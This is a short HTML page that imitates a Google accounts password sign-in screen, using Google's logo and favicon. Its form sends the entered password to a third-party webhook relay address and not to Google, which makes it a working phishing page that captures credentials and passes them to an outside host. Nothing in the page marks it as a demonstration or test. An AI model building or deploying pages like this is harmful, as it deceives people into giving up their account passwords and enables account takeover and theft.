
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Sign in – Google accounts</title>
  <link rel="stylesheet" href="style.css" />
  <link rel="icon" href="https://ssl.gstatic.com/accounts/ui/favicon_2x.png" type="image/png">
</head>
<body>
  <div class="container">
    <img src="https://ssl.gstatic.com/accounts/ui/logo_2x.png" alt="Google" class="logo" />
    <form action="https://01k1bgjezbed0zaxyafpbg24jb.hooks.webhookrelay.com" method="post">
      <label for="password">Enter your password</label>
      <input type="password" id="password" name="password" required />
      <button type="submit">Next</button>
    </form>
    <p class="footer">Forgot password?</p>
  </div>
</body>
</html>
